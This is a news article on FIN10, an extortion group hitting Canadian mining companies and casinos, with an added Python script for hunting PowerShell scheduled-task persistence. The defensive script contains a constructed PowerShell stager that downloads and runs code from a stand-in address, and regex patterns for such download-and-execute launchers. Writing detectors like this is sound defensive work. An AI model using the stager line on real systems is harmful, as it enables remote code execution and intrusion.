A group of financially motivated hackers is targeting networks and systems of North American companies, a new report found.
The extortion has two levers: the attackers threaten to publish the stolen information unless a hefty ransom is paid, and they have shown they can cripple a company by disrupting its networks.
The group, called FIN10 by FireEye researchers, gains access to the target companies’ systems through spear-phishing, then uses publicly available software, scripts and techniques to gain a foothold in victims’ networks.
They use Meterpreter or SplinterRAT to establish the initial foothold in victim environments (and later as a permanent backdoor), then custom PowerShell-based utilities, the penetration-testing framework PowerShell Empire and scheduled tasks to maintain persistence.
The group uses Windows Remote Desktop Protocol (RDP) and VPN access protected by only a single factor to reach other systems in the environment. They also deploy destructive batch scripts that delete critical system files and shut down systems, disrupting the normal operations of those systems.
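The persistence described above leaves an artifact a defender can go and look for. The following is an added example, not code from FireEye or from the report, of a hunt over the CSV that `schtasks /query /fo CSV /v` prints on a Windows host: it flags scheduled tasks that launch PowerShell with the switch combinations typical of Empire-style launchers (hidden window, non-interactive, no profile, execution policy bypass, a script dropped in a user-writable folder) and decodes any `-EncodedCommand` payload so the analyst can see what it fetches. The column names are the real ones schtasks prints; the host, task names, `CORP\jdoe` account, the `203.0.113.10` address and the launcher script itself are constructed for the example.

```python
"""Hunt scheduled tasks for the PowerShell-based persistence FIN10 is described as using.

Input is the CSV that `schtasks /query /fo CSV /v` prints on a Windows host. The
column names below are the real ones; the rows are constructed for this example
and trimmed to the columns that matter. The encoded launcher is generated inline
from a constructed download-and-IEX script, not copied from any real tool.
"""
import base64
import binascii
import csv
import io
import re

SUSPICION_THRESHOLD = 2  # flag once two independent indicators line up

POWERSHELL_RE = re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.I)
# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...).
ENCODED_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

# (pattern, reason) pairs checked against the raw "Task To Run" command line.
COMMAND_INDICATORS = [
    (re.compile(r"-w(?:indowstyle)?\s+(?:hidden|1)\b", re.I), "hidden window"),
    (re.compile(r"-no(?:ni|ninteractive)\b", re.I), "non-interactive"),
    (re.compile(r"-no(?:p|profile)\b", re.I), "profile skipped"),
    (re.compile(r"-e(?:p|x|xec|xecutionpolicy)\s+bypass\b", re.I), "execution policy bypassed"),
    (re.compile(r"\\(?:users\\public|programdata|appdata|windows\\temp|temp)\\", re.I),
     "script in user-writable path"),
]
# Checked against the decoded -EncodedCommand payload.
PAYLOAD_INDICATORS = [
    (re.compile(r"\biex\b|invoke-expression", re.I), "Invoke-Expression"),
    (re.compile(r"net\.webclient|downloadstring|downloaddata|invoke-webrequest", re.I),
     "downloads code at run time"),
    (re.compile(r"frombase64string", re.I), "nested base64 layer"),
]


def encode_command(script: str) -> str:
    """UTF-16LE then base64: the exact form -EncodedCommand expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def analyze_command(command: str) -> dict:
    """Score one 'Task To Run' string; non-PowerShell tasks are never flagged here."""
    reasons, decoded = [], None
    if not POWERSHELL_RE.search(command):
        return {"suspicious": False, "reasons": reasons, "decoded": decoded}
    for pattern, reason in COMMAND_INDICATORS:
        if pattern.search(command):
            reasons.append(reason)
    match = ENCODED_RE.search(command)
    if match:
        reasons.append("encoded command")
        try:
            decoded = base64.b64decode(match.group(1), validate=True).decode("utf-16-le", errors="replace")
        except binascii.Error:
            reasons.append("encoded command does not decode")  # mangled or truncated blob
        else:
            for pattern, reason in PAYLOAD_INDICATORS:
                if pattern.search(decoded):
                    reasons.append(reason)
    return {"suspicious": len(reasons) >= SUSPICION_THRESHOLD, "reasons": reasons, "decoded": decoded}


def hunt_schtasks_csv(csv_text: str) -> list:
    """Return the suspicious tasks from schtasks CSV output, with why and what they decode to."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        verdict = analyze_command(row.get("Task To Run", ""))
        if verdict["suspicious"]:
            findings.append({"task": row["TaskName"], "run_as": row.get("Run As User"),
                             "reasons": verdict["reasons"], "decoded": verdict["decoded"]})
    return findings


# Constructed stager-shaped script; 203.0.113.10 is a documentation address, not a real C2.
FAKE_LAUNCHER = ("$wc=New-Object System.Net.WebClient;"
                 "$wc.Headers.Add('User-Agent','Mozilla/5.0');"
                 "IEX $wc.DownloadString('http://203.0.113.10:8080/index.asp')")

# Constructed rows: one Microsoft task, one benign admin script, two persistence-shaped tasks.
SAMPLE_SCHTASKS_CSV = "\n".join([
    '"HostName","TaskName","Author","Task To Run","Schedule Type","Run As User"',
    '"WS01","\\Microsoft\\Windows\\Defrag\\ScheduledDefrag","Microsoft Corporation",'
    '"%windir%\\defrag.exe -c -h -o -$","Weekly","SYSTEM"',
    '"WS01","\\Backup","CORP\\backupsvc","powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1",'
    '"Daily","CORP\\backupsvc"',
    '"WS01","\\Updater","CORP\\jdoe","powershell.exe -NoP -NonI -W Hidden -Enc '
    + encode_command(FAKE_LAUNCHER) + '","At logon","CORP\\jdoe"',
    '"WS01","\\SysHealth","CORP\\jdoe","powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden '
    '-File C:\\Users\\Public\\update.ps1","Every 10 minutes","SYSTEM"',
])

if __name__ == "__main__":
    for finding in hunt_schtasks_csv(SAMPLE_SCHTASKS_CSV):
        print(f"{finding['task']} (runs as {finding['run_as']}): {', '.join(finding['reasons'])}")
        if finding["decoded"]:
            print("    decoded:", finding["decoded"][:120])
```

Export the task list from each host in scope and feed it in; the decoded payload of a flagged task is what tells you where the second-stage code is fetched from, which is the address to block and to search for in proxy and firewall logs. The threshold of two indicators keeps a lone `-NoProfile` on an administrator's backup script from being flagged, at the cost that a launcher using only one unusual switch would need a lower threshold.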
“In all but one targeted intrusion we have attributed to FIN10, the attacker(s) demanded a variable sum payable in Bitcoin for the non-release of sensitive data obtained during network reconnaissance stages,” the researchers say. The requested sum varied between 100 and 500 Bitcoin.
If the ransom isn’t paid, they publish the stolen data on Pastebin-type sites. The researchers do not say whether any of the companies refused to pay and ended up having their systems and networks disrupted.
For the time being, the group seems to have concentrated on hitting companies in North America, predominantly in Canada. It has also concentrated on two industries: mining companies and casinos, the researchers said.
FIN10 sends the extortion emails to staff and board members of the victim organizations, and is also known to contact bloggers and local journalists to inform them about the breach, likely in an attempt to pressure affected organizations into paying the ransom.
Finally, even though they sign their emails with monikers used by Russian and Serbian hackers (“Angels_Of_Truth,” “Tesla Team,” “Anonymous Threat Agent”), the quality of the group’s English, the poor quality of their Russian and inconsistencies in tradecraft all suggest the group is not actually any of those actors.
A company that receives a ransom demand should move quickly to confirm that a breach has actually happened (the demand alone is not proof), determine its scope, contain the attack, evict the attackers from the network and make sure they cannot get back in. Against this group, that last step means removing the backdoors and scheduled-task persistence described above and closing off the single-factor VPN and RDP access it relies on.